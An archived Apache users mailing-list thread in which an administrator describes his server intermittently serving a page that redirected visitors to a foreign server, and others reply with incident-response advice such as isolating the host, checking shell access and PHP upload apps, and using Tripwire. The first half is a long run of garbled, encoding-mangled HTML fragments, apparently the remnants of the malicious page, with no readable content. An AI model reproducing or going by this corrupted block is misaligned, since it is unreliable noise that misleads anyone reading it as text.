Ð¿â¼ÐÑ=8F ly: Courier;">I2` Times New Roman";">âââ=B4 nt-size: 10pt; font-family: Courier;">now 0pt; font-family: "Times New Roman";">Ñâ=98 style=3D"font-size: 10pt; font-family: Courier;">( nt-size: 10pt; font-family: "Times New Roman";">ââ=94=
âÑÑ Courier;">$ New Roman";">â=94 ily: Courier;">^ Times New Roman";">Ñ amily: Courier;"> ;Times New Roman";">â=A2 nt-family: Courier;">â=9A amily: "Times New Roman";">âÐ=92 ont-size: 10pt; font-family: Courier;">K 0pt; font-family: "Times New Roman";">Ð±Ð yle=3D"font-size: 10pt; font-family: Courier;">! size: 10pt; font-family: "Times New Roman";">ââ£=
Ñ8 > >ÐÐ·â=91 ourier;">WY New Roman";">Ð¥Ð± amily: Courier;">SÂ -size: 10pt; font-family: "Times New Roman";">â¼Ðâ=
Ñ =
uot;;">â=80 ;">p an";">Ðµ r;">q man";">Ð· er;"> oman";">Ð ier;">t Roman";">ÑÐ y: Courier;">P es New Roman";">Ð»Ð«Ñ t; font-family: Courier;">0 ly: "Times New Roman";">ÑÐ ze: 10pt; font-family: Courier;">â=99ha :"V "font-size: 10pt; font-family: "Times New Roman";">ÑÐ³=
â=9Ei span> t;;">â=96 >Z@Â Y ew Roman";">Ñâ Ð=95 ; font-family: Courier;">Y, ly: "Times New Roman";">Ð pt; font-family: Courier;">`- FE4 t-family: "Times New Roman";">Ð® ze: 10pt; font-family: Courier;">a. font-family: "Times New Roman";">Ñ -size: 10pt; font-family: Courier;"> font-family: "Times New Roman";">Ð t-size: 10pt; font-family: Courier;">v0 t; font-family: "Times New Roman";">Ð¸ ont-size: 10pt; font-family: Courier;">Â n> ">Ð ^ pan> ;;">ÐdT<=
/span> ot;;">ÑÑâ ly: Courier;">A mes New Roman";">â family: Courier;">>t "Times New Roman";">â¨â¡â=98 =3D"font-size: 10pt; font-family: Courier;">Â =
uot;;">Ð©Ðâ©Ð³âÑâ=82 e=3D"font-size: 10pt; font-family: Courier;">W } size: 10pt; font-family: "Times New Roman";">Ñ tyle=3D"font-size: 10pt; font-family: Courier;">+ -size: 10pt; font-family: "Times New Roman";">â=93 an style=3D"font-size: 10pt; font-family: Courier;"> fUX =3D"font-size: 10pt; font-family: "Times New Roman";">Ð=D1=
=9Es le=3D"">Â -w "Times New Roman";">Ð² font-family: Courier;">R F ly: "Times New Roman";">â=91 10pt; font-family: Courier;">â=99 t; font-family: "Times New Roman";">Ðâ=95 tyle=3D"font-size: 10pt; font-family: Courier;">5 -size: 10pt; font-family: "Times New Roman";">â=90 an style=3D"font-size: 10pt; font-family: Courier;">d "font-size: 10pt; font-family: "Times New Roman";">âÐ=
§ââ=92 urier;">

Â

Â

~ ";">Ñ ">Y an";">Ð²Ð¢ Courier;"> New Roman";">Ð° Courier;">Y tlk imes New Roman";">Ð°ÑÐ¾Ð ize: 10pt; font-family: Courier;">`â=9A- e: 10pt; font-family: "Times New Roman";">â=84 tyle=3D"font-size: 10pt; font-family: Courier;"> -size: 10pt; font-family: "Times New Roman";">â=BC an style=3D"font-size: 10pt; font-family: Courier;">m font-size: 10pt; font-family: "Times New Roman";">ÑÐ=E2=
. n> ">â=88 pan style=3D"">Â Â
Roman";">â£Ð½âÐâ=A0 font-size: 10pt; font-family: Courier;">{ 10pt; font-family: "Times New Roman";">Ñ =3D"font-size: 10pt; font-family: Courier;">? e: 10pt; font-family: "Times New Roman";">Ñ e=3D"font-size: 10pt; font-family: Courier;">Â >u ";">Ñ ">4d an";">ââ¤ mily: Courier;">J Times New Roman";">Ðâ=95 t; font-family: Courier;">. ly: "Times New Roman";">ÑâÑ=89 =3D"font-size: 10pt; font-family: Courier;">+rqy~ -size: 10pt; font-family: "Times New Roman";">ÐÑÑ=
ââââ font-family: Courier;">mÂ =3D"font-size: 10pt; font-family: "Times New Roman";">â=A3=
Ð¬*
35ez an";">â=A9 rier;">a Roman";">âÐºÑÐ¿Ñ=85 size: 10pt; font-family: Courier;">{ font-family: "Times New Roman";">Ñ -size: 10pt; font-family: Courier;">#e ; font-family: "Times New Roman";">Ñ nt-size: 10pt; font-family: Courier;">: t; font-family: "Times New Roman";">Ñ ont-size: 10pt; font-family: Courier;">>_ : 10pt; font-family: "Times New Roman";">â´ÐÑ=8A pan>x ">Â 1Â°/ "Times New Roman";">Ð» font-family: Courier;">1xQ ly: "Times New Roman";">Ñâ=95 -size: 10pt; font-family: Courier;"> font-family: "Times New Roman";">âÐ²Ð£Ð=B6 an>E le=3D"font-size: 10pt; font-family: "Times New Roman";">Ð¤ pan>,".`=
=
Ð½âÐ=B3 urier;">\ w Roman";">âÐ½Ð=BC font-family: Courier;">a E'Y t-family: "Times New Roman";">ÐÐ¾Ð«ââ=96=
=90

..Z ";">Ñ "> n";">Ð ;">: an";">Ñ r;">l. oman";">Ðâ=90 ily: Courier;">{ imes New Roman";">ââÑÐ½ font-size: 10pt; font-family: Courier;">` 0pt; font-family: "Times New Roman";">Ñ "font-size: 10pt; font-family: Courier;">R 10pt; font-family: "Times New Roman";">Ð =3D"font-size: 10pt; font-family: Courier;"> e: 10pt; font-family: "Times New Roman";">âÐ<=
span style=3D"font-size: 10pt; font-family: Courier;"> Â°K style=3D"font-size: 10pt; font-family: "Times New Roman";">â=
=A9t pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
â Ð¹Ñ=88 urier;">$hH New Roman";">âââ=91 ze: 10pt; font-family: Courier;">Â - an style=3D"font-size: 10pt; font-family: "Times New Roman";">=D0=
´âÐª er;">,i Roman";">âÐ=A2 mily: Courier;">v Times New Roman";">Ð amily: Courier;"> Â¤ "Times New Roman";">â=A1 pt; font-family: Courier;">"H ont-family: "Times New Roman";">Ð¿Ñ "font-size: 10pt; font-family: Courier;">Â¤ ize: 10pt; font-family: "Times New Roman";">Ð yle=3D"font-size: 10pt; font-family: Courier;">âÂ° L n style=3D"font-size: 10pt; font-family: "Times New Roman";">=E2=
W0 n> ">Ðsc pan> ;;">â=B4=
u R% man";">Ñ er;">4 oman";">â=AA ourier;">Yf New Roman";">â=9C ly: Courier;">5 mes New Roman";">â¬âÐ®Ð¢ ont-size: 10pt; font-family: Courier;">,(+y 10pt; font-family: "Times New Roman";">Ñ =3D"font-size: 10pt; font-family: Courier;">: e: 10pt; font-family: "Times New Roman";">ÐÐ n style=3D"font-size: 10pt; font-family: Courier;"> ont-size: 10pt; font-family: "Times New Roman";">Ñ an style=3D"font-size: 10pt; font-family: Courier;">% font-size: 10pt; font-family: "Times New Roman";">ââ=96=
Ñ=89]wR%=
1 quot;;">Ñâ¬Ð=95 mily: Courier;">.r ;Times New Roman";">â=9E nt-family: Courier;"> quot;Times New Roman";">Ñâ=96 : 10pt; font-family: Courier;">Â YRâ=99&l=
t;}
uot;;">â=88 ;"> an";">Ñ r;"> man";">ÐâÐ´â¥ 10pt; font-family: Courier;">-q -family: "Times New Roman";">â=96 size: 10pt; font-family: Courier;">_ font-family: "Times New Roman";">â©â¬ tyle=3D"font-size: 10pt; font-family: Courier;">{2Y nt-size: 10pt; font-family: "Times New Roman";">ÑÑ=E2=
â=94 "> n";">â´â¤ÑÑÐ ze: 10pt; font-family: Courier;">A+Q font-family: "Times New Roman";">âââÐ=
=A7Â° an> ;">â=90{=
uot;;">ÐâÑÐ=9F nt-family: Courier;">

Â

w quot;;">Ð¨ >A ";">â¼â£âÑ=8E 10pt; font-family: Courier;">4R family: "Times New Roman";">Ñ : 10pt; font-family: Courier;">s -family: "Times New Roman";">â=A0 size: 10pt; font-family: Courier;">F font-family: "Times New Roman";">Ð·â â£<=
span style=3D"font-size: 10pt; font-family: Courier;">{ =3D"font-size: 10pt; font-family: "Times New Roman";">â=99 span> k style=3D"font-size: 10pt; font-family: "Times New Roman";">â=
Ð¹Ñâ Courier;">8 New Roman";">ââ font-family: Courier;"> : "Times New Roman";">â â¢Ð«Ðâ=9C an># le=3D"font-size: 10pt; font-family: "Times New Roman";">Ð=D0=
½ÐÑ=8F ">â=96~ o es New Roman";">ââ£Ð«Ð¤Ð° =3D"font-size: 10pt; font-family: Courier;"> &28

^ quot;;">â=AB r;">@O} Roman";">Ñ rier;">: Roman";">â=A8 Courier;">f -A mes New Roman";">Ð¿ÐµÐª pt; font-family: Courier;">Â Â Â Â Â =
Roman";">Ð¦Ð y: Courier;"> es New Roman";">Ð®â=98 font-family: Courier;">k "Times New Roman";">â=9A pt; font-family: Courier;"> ily: "Times New Roman";">Ð¿Ðâ=84 =3D"font-size: 10pt; font-family: Courier;">{ e: 10pt; font-family: "Times New Roman";">Ñ e=3D"font-size: 10pt; font-family: Courier;">Â· nt-size: 10pt; font-family: "Times New Roman";">â=9C<=
span style=3D"font-size: 10pt; font-family: Courier;">/ =3D"font-size: 10pt; font-family: "Times New Roman";">â=96 span>U tyle=3D"font-size: 10pt; font-family: "Times New Roman";">Ñ=
Ð«q$a an> ;">Ð¹Ðºâ=94 Courier;">x New Roman";">ÐÑÑ font-family: Courier;">| : "Times New Roman";">â=90 0pt; font-family: Courier;"> 5Â 1 style=3D"font-size: 10pt; font-family: "Times New Roman";">â=
=84 pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
Ð > >Ð¯ÑÑÑ : Courier;">|Â : 10pt; font-family: "Times New Roman";">â=80 yle=3D"font-size: 10pt; font-family: Courier;">w size: 10pt; font-family: "Times New Roman";">â=84 n style=3D"font-size: 10pt; font-family: Courier;">o ont-size: 10pt; font-family: "Times New Roman";">Ñ an style=3D"font-size: 10pt; font-family: Courier;"> 4 "font-size: 10pt; font-family: "Times New Roman";">ÑÐ½ span>c tyle=3D"font-size: 10pt; font-family: "Menlo Regular";">ï¿=BD=
uot;;">â=9F ;">? an";">â=9E rier;">dLM# New Roman";">Ð³ Courier;">x New Roman";">â=96 ily: Courier;">l imes New Roman";">ââ 0pt; font-family: Courier;">J mily: "Times New Roman";">ââÐ° yle=3D"font-size: 10pt; font-family: Courier;">J size: 10pt; font-family: "Times New Roman";">Ð« tyle=3D"font-size: 10pt; font-family: Courier;">a

uot;;">â=99 ;">v* man";">ÑÑ Courier;">8x~v mes New Roman";">ÑÑÑ pt; font-family: Courier;">ow+v family: "Times New Roman";">â=A8 ize: 10pt; font-family: Courier;">\ font-family: "Times New Roman";">Ð -size: 10pt; font-family: Courier;"> font-family: "Times New Roman";">â=A5 font-size: 10pt; font-family: Courier;">dJ!Â <=
/span> ot;;">â=82 ">Â· Roman";">â=A0 Courier;">_, s New Roman";">Ðªâ«Ð¨ÑÐ° font-size: 10pt; font-family: Courier;"> 0pt; font-family: "Times New Roman";">â=9A =3D"font-size: 10pt; font-family: Courier;">K e: 10pt; font-family: "Times New Roman";">ÑÐ¤ n style=3D"font-size: 10pt; font-family: Courier;"> ont-size: 10pt; font-family: "Times New Roman";">Ð an style=3D"font-size: 10pt; font-family: Courier;"> font-size: 10pt; font-family: "Times New Roman";">Ñ pan style=3D"font-size: 10pt; font-family: Courier;">* "font-size: 10pt; font-family: "Times New Roman";">Ñ<=
span style=3D"font-size: 10pt; font-family: Courier;">Y =3D"font-size: 10pt; font-family: "Times New Roman";">â=A4=
â=A2 r span> t;;">â¼Ð=BC rier;">1 Roman";">Ð¡ urier;">4 w Roman";">Ð ourier;">8< es New Roman";">â=97 amily: Courier;">ka t;Times New Roman";">Ðâ=88 0pt; font-family: Courier;">C mily: "Times New Roman";">ÐÑÐ§Ðââ=95=
«Ð=B3G pan> ;;">ÑÑâ¤â nt-family: Courier;">âÂ=B7"O : 10pt; font-family: "Times New Roman";">Ð§â=A4 pan style=3D"font-size: 10pt; font-family: Courier;"> "font-size: 10pt; font-family: "Times New Roman";">âÑ=
=97 R_â=
=9AY an";">Ð r;">.&
|Â -family: "Times New Roman";">ÐÐ¶ nt-size: 10pt; font-family: Courier;">tX pt; font-family: "Times New Roman";">Ð font-size: 10pt; font-family: Courier;">HÂ° ize: 10pt; font-family: "Times New Roman";">â¤â¤ pan>Â¤ an style=3D"font-size: 10pt; font-family: "Times New Roman";">=D0=
ÐÐ=90 ">D n";">ââÐ nt-family: Courier;"> quot;Times New Roman";">Ñâ=95 : 10pt; font-family: Courier;">r Â¤

Â

KV$ n";">Ð§ ;">Â Â Â Â Â e=3D"font-size: 10pt; font-family: "Times New Roman";">â=99=
Ð¨Ð»W=
uot;;">Ð=
'8z Roman";">âÐ â ; font-family: Courier;"> y: "Times New Roman";">Ð t; font-family: Courier;">k ly: "Times New Roman";">â=9B 10pt; font-family: Courier;">YEx t-family: "Times New Roman";">âÑ=85 =3D"font-size: 10pt; font-family: Courier;">upDBR -size: 10pt; font-family: "Times New Roman";">Ð³Ð=
4 =3D"font-size: 10pt; font-family: "Times New Roman";">Ð³ n>I e=3D"font-size: 10pt; font-family: "Times New Roman";">Ð¼=D1=
=9442p$ > >â¢Ð=A3 ;"> an";">ÐÐ Courier;"> New Roman";">Ñ Courier;">Â¤f ;Times New Roman";">â=A6 nt-family: Courier;"> >
uot;;">Ð=
?>Â
Roman";">Ñ rier;">'ci mes New Roman";">Ð²â=AB font-family: Courier;">i : "Menlo Regular";">ï¿=BD t; font-family: "Times New Roman";">ÐÐ¹Ð n style=3D"font-size: 10pt; font-family: Courier;">a ont-size: 10pt; font-family: "Times New Roman";">Ñ an style=3D"font-size: 10pt; font-family: Courier;"> ~ "font-size: 10pt; font-family: "Times New Roman";">Ð<=
span style=3D"font-size: 10pt; font-family: Courier;">V =3D"font-size: 10pt; font-family: "Times New Roman";">Ð¢ n>M e=3D"font-size: 10pt; font-family: "Times New Roman";">Ð an>0 le=3D"font-size: 10pt; font-family: "Times New Roman";">â=A9=
ââ¥â=98 ly: Courier;"> ** Times New Roman";">Ñ amily: Courier;">A ;Times New Roman";">â=9E nt-family: Courier;"> quot;Times New Roman";">Ð£â=91 : 10pt; font-family: Courier;"> #mgDS. ; font-family: "Times New Roman";">Ñ nt-size: 10pt; font-family: Courier;">â=9A v -size: 10pt; font-family: "Times New Roman";">Ð¾ style=3D"font-size: 10pt; font-family: Courier;"> 2 nt-size: 10pt; font-family: "Times New Roman";">Ð±Ð· n>X" n style=3D"font-size: 10pt; font-family: "Times New Roman";">=D0=
¬â¥ÐÐ° Courier;">N + es New Roman";">Ð±Ð t-family: Courier;">>â=99 t-family: "Times New Roman";">Ð±Ñ ont-size: 10pt; font-family: Courier;">~ 0pt; font-family: "Times New Roman";">Ð "font-size: 10pt; font-family: Courier;">; 10pt; font-family: "Times New Roman";">Ñ =3D"font-size: 10pt; font-family: Courier;">LÂ >O ";">Ñ ">> oman";">Ð¡ ier;">p Roman";">âÐµÑÐ=90 0pt; font-family: Courier;">8< t-family: "Times New Roman";">Ð¼ÐÑÐ£â=A0 span> tyle=3D"font-size: 10pt; font-family: "Times New Roman";">â=
=97 pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
ÐÑn=
uot;;">Ñ=
|< man";">â¨Ð=B4 ly: Courier;">_ mes New Roman";">Ð£â=88 font-family: Courier;">w? y: "Times New Roman";">â§Ñ=8C size: 10pt; font-family: Courier;">:Y
â=99l- New Roman";">Ð Courier;"> New Roman";">Ð¸ : Courier;">SF es New Roman";">â¡Ð=A8 font-family: Courier;">
fa,VW man";">ÑÐ Courier;">ZW s New Roman";">Ð y: Courier;">Â¤ t;Times New Roman";">Ð¬Ð ; font-family: Courier;">. y: "Times New Roman";">ÑÐ¬ e: 10pt; font-family: Courier;">Â°] t; font-family: "Times New Roman";">Ð¥ ont-size: 10pt; font-family: Courier;"> pt; font-family: "Times New Roman";">âÑÑÐ=9C=
â=9C

Â

uot;;">Ð±Ð¸â=9D ily: Courier;">9 imes New Roman";">ÑÐ¹ ont-family: Courier;">+ "Times New Roman";">â t; font-family: Courier;">BÂ
A& es New Roman";">â=94 amily: Courier;">- ;Times New Roman";">Ð§ family: Courier;">n t;Times New Roman";">Ð´ -family: Courier;">UX uot;Times New Roman";">â=92 font-family: Courier;">uu ly: "Times New Roman";">Ð² pt; font-family: Courier;">F mily: "Times New Roman";">Ð 10pt; font-family: Courier;"> )Od t-family: "Times New Roman";">Ñ ze: 10pt; font-family: Courier;">

uot;;">Ñ=
b6 n";">Ð© ;"> an";">Ð¥ r;">kBy Roman";">ÐÐ y: Courier;">V! mes New Roman";">âÐ=A4 font-family: Courier;">' mily: "Times New Roman";">â=A0 e: 10pt; font-family: Courier;">!D nt-family: "Times New Roman";">â=91 t-size: 10pt; font-family: Courier;">U ; font-family: "Times New Roman";">Ð¡ nt-size: 10pt; font-family: Courier;">LA 0pt; font-family: "Times New Roman";">âÐ=A5 style=3D"font-size: 10pt; font-family: Courier;">/% ont-size: 10pt; font-family: "Times New Roman";">ÐÑ=D1=
=87(d<=
span style=3D"font-size: 10pt; font-family: "Times New Roman";">=
â âÐ Courier;">x6 s New Roman";">Ñ y: Courier;">; es New Roman";">ÐÐ§Ðº t; font-family: Courier;">H ly: "Times New Roman";">Ð¹ pt; font-family: Courier;"> s mily: "Times New Roman";">â=A3 e: 10pt; font-family: Courier;">Ozn ont-family: "Times New Roman";">Ðâ=9C =3D"font-size: 10pt; font-family: Courier;">H e: 10pt; font-family: "Times New Roman";">Ð£ÐÑ n> e=3D"font-size: 10pt; font-family: "Times New Roman";">â=AA=
â=A4L S<=
/span> ot;;">ÐÐ er;">(Â Â Â Â Â tyle=3D"font-size: 10pt; font-family: "Times New Roman";">Ð¼=
Ð¼& span> t;;">â=97 >Z3NvJ oman";">â=A3 ourier;">p New Roman";">Ñ Courier;">h New Roman";">â=96 ily: Courier;">w imes New Roman";">â -family: Courier;">] uot;Times New Roman";">â=A6 font-family: Courier;">

Â amily: "Times New Roman";">Ð¡ââ´ tyle=3D"font-size: 10pt; font-family: Courier;">â=96 =3D"font-size: 10pt; font-family: "Times New Roman";">â=90 span>Â i<=
span style=3D"font-size: 10pt; font-family: "Times New Roman";">=
ÑÑÐ er;">m 4 Roman";">â=80 Courier;">7 New Roman";">Ñ : Courier;">b s New Roman";">Ðµ y: Courier;">zq mes New Roman";">â=91 family: Courier;">h t;Times New Roman";">ÐÐ¤Ðâ¤â style=3D"font-size: 10pt; font-family: Courier;">N& =3D"font-size: 10pt; font-family: "Times New Roman";">â=94 span>-

Â *X;T nt-family: "Times New Roman";">ÑÐÐ¡ le=3D"font-size: 10pt; font-family: Courier;">D ize: 10pt; font-family: "Times New Roman";">Ñ yle=3D"font-size: 10pt; font-family: Courier;">{. -size: 10pt; font-family: "Times New Roman";">â=A3 an style=3D"font-size: 10pt; font-family: Courier;">X font-size: 10pt; font-family: "Times New Roman";">âÐ=B6=
ÐY > >âÑ=80 ;"> nbgl Roman";">â¦â t-family: Courier;">E uot;Times New Roman";">â=82 font-family: Courier;">$S ly: "Times New Roman";">Ð£âÐÑ=80 tyle=3D"font-size: 10pt; font-family: Courier;"> qÂ =
Â Â Â Â K# nt-family: "Times New Roman";">Ð ize: 10pt; font-family: Courier;">3F font-family: "Times New Roman";">Ð± -size: 10pt; font-family: Courier;">: font-family: "Times New Roman";">â=9A font-size: 10pt; font-family: Courier;">Â·1Â an> n";">Ð ;"> an";">Ñ r;">q man";">Ð¾ er;">] oman";">Ðâ=88 ily: Courier;">r imes New Roman";">Ð mily: Courier;"> n: t;Times New Roman";">âÐâ¨ t-size: 10pt; font-family: Courier;"> ; font-family: "Times New Roman";">Ð«âÐ=95 pan style=3D"font-size: 10pt; font-family: Courier;">; "font-size: 10pt; font-family: "Times New Roman";">Ð<=
span style=3D"font-size: 10pt; font-family: Courier;">z =3D"font-size: 10pt; font-family: "Times New Roman";">â=A6 span>0 tyle=3D"font-size: 10pt; font-family: "Times New Roman";">â=
â©5=
uot;;">Ð¡â¤Ðâ¤ font-family: Courier;">R : "Times New Roman";">â=9C 0pt; font-family: Courier;">Â Â Â Â Â =
Roman";">Ð« urier;">r

uot;;">âÐ=AF ourier;">yy4 New Roman";">â=82 ily: Courier;"> imes New Roman";">â -family: Courier;">> "Times New Roman";">âÐÐ=9D nt-size: 10pt; font-family: Courier;">) t; font-family: "Times New Roman";">â=9F =3D"font-size: 10pt; font-family: Courier;">{ e: 10pt; font-family: "Times New Roman";">ÐÐ© n style=3D"font-size: 10pt; font-family: Courier;">( ont-size: 10pt; font-family: "Times New Roman";">Ñ an style=3D"font-size: 10pt; font-family: Courier;">4 font-size: 10pt; font-family: "Times New Roman";">ââ=95=
=A8 e=3D"">Â Â ly: "Times New Roman";">Ñ pt; font-family: Courier;"> ily: "Times New Roman";">â=A0 : 10pt; font-family: Courier;"> -family: "Times New Roman";">Ð£ e: 10pt; font-family: Courier;"> | nt-family: "Times New Roman";">Ð ize: 10pt; font-family: Courier;">Y8Â°y 10pt; font-family: "Times New Roman";">â=96 le=3D"font-size: 10pt; font-family: Courier;">z ize: 10pt; font-family: "Times New Roman";">Ðâ=80 >@$D sâ=96 n> ">âÐ=B9 r;">b man";">âÐ=B6 ly: Courier;">1 mes New Roman";">ÐÐ¿Ñââ¦Ð n style=3D"font-size: 10pt; font-family: Courier;">Pq_â=99 style=3D"font-size: 10pt; font-family: "Times New Roman";">=D0=
£Ð=BD8q <=
/span> ot;;">â=92 ">j an";">ââ¢ mily: Courier;">B Times New Roman";">â=91 t-family: Courier;">Â nt-size: 10pt; font-family: "Times New Roman";">â¡Ñ=8C span>< an style=3D"font-size: 10pt; font-family: "Times New Roman";">=E2=
ªÑ*=
uot;;">Ð«ÐÐ : Courier;">e es New Roman";">Ð ly: Courier;">kT| Times New Roman";">âÑ=8D t; font-family: Courier;"> - ily: "Times New Roman";">Ð 0pt; font-family: "Menlo Regular";">ï¿=BD =3D"font-size: 10pt; font-family: "Times New Roman";">â=B4 span>Z style=3D"font-size: 10pt; font-family: "Times New Roman";">â=
â«â â amily: Courier;">=3D 4 quot;Times New Roman";">â=90 ; font-family: Courier;">Q y: "Times New Roman";">ââ nt-size: 10pt; font-family: Courier;">@ t; font-family: "Times New Roman";">Ðâ=98 tyle=3D"font-size: 10pt; font-family: Courier;"> -size: 10pt; font-family: "Times New Roman";">âÐ=AE an>" n style=3D"font-size: 10pt; font-family: "Times New Roman";">=D0=
Ðâ¼ er;">Lx Roman";">Ð¦ rier;">A Roman";">âªÐµâÐ½ e: 10pt; font-family: Courier;"> t-family: "Times New Roman";">ÑÐ¼Ð e=3D"font-size: 10pt; font-family: Courier;">Y ize: 10pt; font-family: "Times New Roman";">Ñ yle=3D"font-size: 10pt; font-family: Courier;">J size: 10pt; font-family: "Times New Roman";">Ñâ¢Ð=
ªÐâ er;"> oman";">ââ¥Ñâ=9B ze: 10pt; font-family: Courier;">Â° t; font-family: "Times New Roman";">Ð¼ÑÐÑ=E2=
¥â=97 ">>nG~CH(d" t;Times New Roman";">âÐ=93 0pt; font-family: Courier;">c mily: "Times New Roman";">ÐÐ Ðµ "font-size: 10pt; font-family: Courier;">Â¤â=96a=
Â es New Roman";">ââ t; font-family: Courier;">Â 69 le=3D"font-size: 10pt; font-family: "Times New Roman";">â=96=
Â n> ">ÐoX;w<=
/span> ot;;">Ñ =
uot;;">Ñ=
l quot;;">Ñâ=A1 Courier;">sÂ Â
Y Roman";">Ð urier;">L w Roman";">Ð¨ ourier;">@Â Â
Roman";">â=97 Courier;"> â=9ACÂ Z ily: "Times New Roman";">Ñ 0pt; font-family: Courier;"> mily: "Times New Roman";">Ñ 10pt; font-family: Courier;">"Â° 0pt; font-family: "Times New Roman";">ÐÐ yle=3D"font-size: 10pt; font-family: Courier;">Pc -size: 10pt; font-family: "Times New Roman";">Ð§ style=3D"font-size: 10pt; font-family: Courier;">a)g ont-size: 10pt; font-family: "Times New Roman";">Ð£ an style=3D"font-size: 10pt; font-family: Courier;">e font-size: 10pt; font-family: "Times New Roman";">ÑÐ´ pan>4NH style=3D"font-size: 10pt; font-family: "Times New Roman";">â=
=90 e=3D"">Â / quot;Times New Roman";">â=90 ; font-family: Courier;">!c ly: "Times New Roman";">Ð¡ÐÐµÐ â=A4<=
span style=3D"font-size: 10pt; font-family: Courier;"> =3D"font-size: 10pt; font-family: "Times New Roman";">Ð¹=E2=
Ð³Ð¤ er;">C oman";">Ñ ier;"> .9+ ew Roman";">ÑÐ«ââª ize: 10pt; font-family: Courier;">Â Â Â Â =
Â es New Roman";">Ñ ly: Courier;">5X Times New Roman";">Ñ amily: Courier;">
6< man";">Ñââ¼ font-family: "Menlo Regular";">ï¿=BD t-size: 10pt; font-family: "Times New Roman";">Ðª style=3D"font-size: 10pt; font-family: Courier;">$ nt-size: 10pt; font-family: "Times New Roman";">â¨Ñ=82=
â¥âÐÐ¡Ðâ=A5 e: 10pt; font-family: Courier;"> â=96u 10pt; font-family: "Times New Roman";">â=9E le=3D"font-size: 10pt; font-family: Courier;">a ize: 10pt; font-family: "Times New Roman";">Ð yle=3D"font-size: 10pt; font-family: Courier;">t size: 10pt; font-family: "Times New Roman";">ÐÐ¥<=
span style=3D"font-size: 10pt; font-family: Courier;">^ =3D"font-size: 10pt; font-family: "Times New Roman";">Ð n>W?K yle=3D"font-size: 10pt; font-family: "Times New Roman";">Ñ=
â=962 span> t;;">Ð¹Ð¼Ð£Ñâ=93 ; font-family: Courier;">4 y: "Times New Roman";">Ð t; font-family: Courier;"> E

>==================

The address indicated in the begining of the page code leads to some chines=
e
server.

t; font-family: Times;">

=3D"font-size: 10pt; font-family: Times;">
So, somehow it happened that the output of the apache server was substitute=
d by
this page, which redirected visitors to some chinese server. tyle=3D"font-size: 10pt; font-family: Times;">It is the second
time I am posting to the mailing list, the first time the mailing list
virus scanner identified the content as having the Troj/Fujif-Gen
virus, thus, this time I removed active links from the message body so
it is not exactly what I received).
t; font-family: Times;">

But the most strange thing was that the problem dissapeared itself! So, it =
last
for 10 minutes then disappeared! And the again started and again dissapeare=
d.
Finally, I turned down apache untill I understand what is going on...

Any idea how could that happen?Â How to reproduce this? How to prevent=
?

Where to look for logs? I have check both ssh logs and apache logs, there i=
s
nothing that could seem unusual there...

Any help is appreciated.

Oleg.

--0016e6dbded802cadd04835bab59--

Re: Someone hacked my apache2 server

am 04.04.2010 00:05:54 von Nick Kew

On 3 Apr 2010, at 22:20, Oleg Goryunov wrote:

> Hello all,
> It looks like someone hacked my apache2 server and I am trying to =
understand how this could have happened.
> This is what happened:

Yep, someone's been there. Take it off the 'net, if you haven't =
already!
And get someone competent to look: anyone on a list like this
can only speculate!

First question, who has non-WWW access, particularly a shell?
If the offending files are owned by a user other than the webserver,
it's not likely to have happened through the server. And if that's
happened, you may want to reinstall the server starting with a clean
operating system install.

If it did happen through the server, what apps let you upload contents?
The usual suspect in cases like this is some shoddy PHP app. You might =
also
want to fire the admin who left contents space writable by the web user!

--=20
Nick Kew=

------------------------------------------------------------ ---------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

Re: Someone hacked my apache2 server

am 04.04.2010 00:24:25 von Oleg Goryunov

--0015175cad8c20e23504835c9011
Content-Type: text/plain; charset=ISO-8859-1

Nick,
Thanks for your reply.
THe problem is that I do not see any files changed on the server (and thus
cannot check the owner of them). Where should I look for the possible
evidence of someone else being there?

On Sun, Apr 4, 2010 at 2:05 AM, Nick Kew wrote:

>
> On 3 Apr 2010, at 22:20, Oleg Goryunov wrote:
>
>
>
> Yep, someone's been there. Take it off the 'net, if you haven't already!
> And get someone competent to look: anyone on a list like this
> can only speculate!
>
> First question, who has non-WWW access, particularly a shell?
> If the offending files are owned by a user other than the webserver,
> it's not likely to have happened through the server. And if that's
> happened, you may want to reinstall the server starting with a clean
> operating system install.
>
> If it did happen through the server, what apps let you upload contents?
> The usual suspect in cases like this is some shoddy PHP app. You might
> also
> want to fire the admin who left contents space writable by the web user!
>
> --
> Nick Kew
> ------------------------------------------------------------ ---------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>

--0015175cad8c20e23504835c9011
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

Nick,
Thanks for your reply.
THe problem is that I do not see any fil=
es changed on the server (and thus cannot check the owner of them). Where s=
hould I look for the possible evidence of someone else being there?

On Sun, Apr 4, 2010 at 2:05 AM, Nick Kew ir=3D"ltr"><&g=
t; wrote:

1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex=
;">

On 3 Apr 2010, at 22:20, Oleg Goryunov wrote:

Yep, someone's been there. =A0Take it off the 'net, if you ha=
ven't already!

And get someone competent to look: anyone on a list like this

can only speculate!

First question, who has non-WWW access, particularly a shell?

If the offending files are owned by a user other than the webserver,

it's not likely to have happened through the server. =A0And if that'=
;s

happened, you may want to reinstall the server starting with a clean

operating system install.

If it did happen through the server, what apps let you upload contents?

The usual suspect in cases like this is some shoddy PHP app. =A0You might a=
lso

want to fire the admin who left contents space writable by the web user! >

--

Nick Kew

------------------------------------------------------------ ---------

The official User-To-User support forum of the Apache HTTP Server Project.<=
br>
See <URL: lank">http://httpd.apache.org/userslist.html> for more info.

To unsubscribe, e-mail: g">users-unsubscribe@httpd.apache.org

=A0 " =A0 from the digest: @httpd.apache.org">users-digest-unsubscribe@httpd.apache.org

For additional commands, e-mail: org">users-help@httpd.apache.org

--0015175cad8c20e23504835c9011--

Re: Someone hacked my apache2 server

am 04.04.2010 01:28:49 von Morgan Gangwere

On 4/3/2010 4:24 PM, Oleg Goryunov wrote:
>
> THe problem is that I do not see any files changed on the server (and
> thus cannot check the owner of them). Where should I look for the
> possible evidence of someone else being there?

Do you have Tripwire installed?
